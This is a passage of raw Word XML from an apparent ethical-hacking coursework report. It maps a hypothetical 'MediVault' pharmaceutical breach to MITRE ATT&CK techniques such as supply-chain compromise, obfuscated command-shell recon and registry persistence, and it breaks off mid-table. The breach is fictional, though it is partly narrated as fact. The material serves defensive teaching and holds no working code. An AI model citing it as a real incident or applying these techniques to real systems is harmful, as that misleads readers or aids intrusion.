        <w:t>. The main attraction is the intellectual property (IP). Confidential drug formulas, sensitive vaccine research, and critical as well as non-public clinical trial results represent what happens to be on the table. Not only does the theft of this IP put a huge dent in the competitive advantage, but it may also strike at the heart of national security interests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE11EEE" w14:textId="3CBFD68D" w:rsidR="001150FA" w:rsidRPr="00A157FB" w:rsidRDefault="001150FA" w:rsidP="001150FA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A157FB">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve">Strategic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE4B0D">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>Defence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A157FB">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Ethical Hacking Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D3ADA" w14:textId="7598D037" w:rsidR="00A55F7D" w:rsidRDefault="00285046" w:rsidP="00285046">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared for the very challenging Level 7 Ethical Hacking module, this review strengthens the significant gap for security professionals who ought to think like attackers so they can create proactive yet effective </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE4B0D">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>defence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve"> strategies. A report that shall carefully map out the lifecycle of modern </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>cyberattack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve"> methodologies accompanies it by including every phase involved from compromise—which is the initial foothold—lateral movement, and command-and-control establishment up to data exfiltration. Strategic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE4B0D">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>defence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve"> planning shall be retrospectively initiated in Part 1 by drawing lessons from historical breaches</w:t>
      </w:r>
      <w:r w:rsidR="00AE4B0D">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:hyperlink w:anchor="First" w:history="1">
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
            </w:rPr>
            <w:id w:val="-735013595"/>
            <w:citation/>
          </w:sdtPr>
          <w:sdtEndPr>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
            </w:rPr>
          </w:sdtEndPr>
          <w:sdtContent>
            <w:r w:rsidR="00014265" w:rsidRPr="007A16D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00014265" w:rsidRPr="007A16D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> CITATION MIT25 \l 1033 </w:instrText>
            </w:r>
            <w:r w:rsidR="00014265" w:rsidRPr="007A16D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007A16D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007A16D1" w:rsidRPr="007A16D1">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="0563C1" w:themeColor="hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
            <w:r w:rsidR="00014265" w:rsidRPr="007A16D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:sdtContent>
        </w:sdt>
      </w:hyperlink>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>. Initiation is made in Part 2 through an overview of methods proactively emulating adversaries and red-teaming, which will further drill down into details that translate into concrete actions toward making these significant research institutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A684FBF" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00456084">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc215571126"/>
      <w:r>
        <w:t>Task 1:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="6C0F7333" w14:textId="11C1FF35" w:rsidR="00456084" w:rsidRDefault="000C0349" w:rsidP="00A7467C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc215571127"/>
      <w:r w:rsidRPr="000C0349">
        <w:t>Strategic Threat Analysis – From Headlines to TTPs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="27C36F7A" w14:textId="77777777" w:rsidR="000C0349" w:rsidRDefault="00456084" w:rsidP="00456084">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc215571128"/>
      <w:r w:rsidRPr="00456084">
        <w:t>Case Study Selection: The "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00456084">
        <w:t>MediVault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00456084">
        <w:t>" Breach (Revised for 2025 Scenarios)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0F987038" w14:textId="10AE41F4" w:rsidR="00456084" w:rsidRDefault="00456084" w:rsidP="00456084">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MediVault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Research breach, a </w:t>
      </w:r>
      <w:r w:rsidR="00DE2A4F">
        <w:t xml:space="preserve">projection </w:t>
      </w:r>
      <w:r w:rsidR="00AE4B0D">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00DE2A4F">
        <w:t>depends</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on realistic state-sponsored economic espionage observed in 2024, is chosen for this deep dive. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MediVault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, a major European firm, was compromised while developing critical Monoclonal Antibody (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mAb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) treatments, representing IP valued in the billions. The </w:t>
      </w:r>
      <w:r w:rsidR="00DE2A4F">
        <w:t>main enemy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is emulated as an APT41 variant (or a proxy)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> known for its "dual-use" nature—simultaneously targeting state interests (IP theft) and conducting financially motivated operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6615C01A" w14:textId="77777777" w:rsidR="00456084" w:rsidRDefault="00456084" w:rsidP="00456084">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B778247" w14:textId="77777777" w:rsidR="00456084" w:rsidRDefault="00456084" w:rsidP="00456084">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The initial </w:t>
      </w:r>
      <w:r w:rsidR="00DE2A4F">
        <w:t>stage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was </w:t>
      </w:r>
      <w:r w:rsidR="00DE2A4F">
        <w:t>attacked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> not through a single email, but through a CI/CD Supply Chain compromise (T1195.002). </w:t>
      </w:r>
      <w:r w:rsidR="00DE2A4F">
        <w:t>More precisely</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidR="00DE2A4F">
        <w:t>enemy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> targeted a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GitHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Actions runner associated with a trusted vendor’s internal HR portal. By exploiting a known </w:t>
      </w:r>
      <w:r w:rsidR="00DE2A4F">
        <w:t>insecurity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the runner's underlying </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> image, the adversary injected a malicious post-build script. This script was then executed on a perimeter-facing build server within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MediVault's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> network, which had </w:t>
      </w:r>
      <w:r w:rsidR="00DE2A4F">
        <w:t>deducible</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trust to communicate with internal resources. This failure highlights the shift from direct exploitation to trust exploitation within the developer workflow as the preferred initial access vector for high-value targets. The subsequent actions demonstrated a meticulous focus on Living-Off-the-Cloud (LOTC) techniques, pivoting the compromise from the on-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> build server directly into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MediVault’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> AWS Identity and Access Management (IAM) structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CDE004" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_Toc215571129"/>
      <w:r>
        <w:t>Adversary Campaign Mapping (MITRE ATT&amp;CK®)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="0F17EDF8" w14:textId="20845D26" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>The adversary’s campaign is systematically mapped across the MITRE ATT&amp;CK® Enterprise Matrix</w:t>
      </w:r>
      <w:r w:rsidR="00AE4B0D">
        <w:t>.</w:t>
      </w:r>
      <w:hyperlink w:anchor="First" w:history="1">
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
            </w:rPr>
            <w:id w:val="-1916313172"/>
            <w:citation/>
          </w:sdtPr>
          <w:sdtEndPr>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
            </w:rPr>
          </w:sdtEndPr>
          <w:sdtContent>
            <w:r w:rsidR="00014265" w:rsidRPr="007A16D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00014265" w:rsidRPr="007A16D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> CITATION MIT25 \l 1033 </w:instrText>
            </w:r>
            <w:r w:rsidR="00014265" w:rsidRPr="007A16D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007A16D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007A16D1" w:rsidRPr="007A16D1">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="0563C1" w:themeColor="hyperlink"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
            <w:r w:rsidR="00014265" w:rsidRPr="007A16D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:sdtContent>
        </w:sdt>
      </w:hyperlink>
      <w:r w:rsidR="007A16D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This provides a detailed, granular view of the observed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE4B0D">
        <w:t>behaviours</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, which is crucial for the development of focused detection and mitigation strategies.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15"/>
        <w:gridCol w:w="1127"/>
        <w:gridCol w:w="2662"/>
        <w:gridCol w:w="4066"/>
      </w:tblGrid>
      <w:tr w:rsidR="00133237" w14:paraId="2BC4B035" w14:textId="77777777" w:rsidTr="005749AD">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="241107E1" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00133237">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>MITRE Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C6812D6" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00133237">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>TTP ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FA77C3F" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00133237">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Technique/Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57567B4A" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00133237">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Explanation in "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00133237">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>MediVault</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00133237">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>" Context</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00133237" w14:paraId="084F2EC5" w14:textId="77777777" w:rsidTr="005749AD">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33A8B16E" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00A157FB" w:rsidRDefault="00133237" w:rsidP="00A157FB">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69AB8A12" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>T1195.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74DCCED2" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>Compromise Software Supply Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55F738E9" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Analysis:</w:t>
            </w:r>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">The adversary compromised the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>CI/CD pipeline</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> of a trusted vendor, leading to the deployment of a malicious payload on an internal, perimeter-facing build server. The trusted nature of the deployment channel allowed the initial execution to bypass most network ingress filters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00133237" w14:paraId="014428FA" w14:textId="77777777" w:rsidTr="005749AD">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60C1F329" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00A157FB" w:rsidRDefault="00133237" w:rsidP="00A157FB">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9A638F" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>T1059.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CEA1B7F" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>Command and Scripting Interpreter: Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C2DB9F7" w14:textId="7CFB052D" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Analysis:</w:t>
            </w:r>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Upon establishing a beachhead, the attacker used highly obfuscated, single-line </w:t>
            </w:r>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cmd.exe</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> or batch commands to perform initial reconnaissance and environment checks. These commands are </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00AE4B0D">
              <w:t>favoured</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> for their low-resource profile and ability to execute staging commands before deploying the main C2 beacon.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00133237" w14:paraId="742AB01C" w14:textId="77777777" w:rsidTr="005749AD">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EE4B632" w14:textId="77777777" w:rsidR="00133237" w:rsidRPr="00A157FB" w:rsidRDefault="00133237" w:rsidP="00A157FB">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A157FB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="172E588F" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>T1547.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6808345C" w14:textId="77777777" w:rsidR="00133237" w:rsidRDefault="00133237" w:rsidP="00133237">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Boot or Logon </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Execution: Registry Run Keys / Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
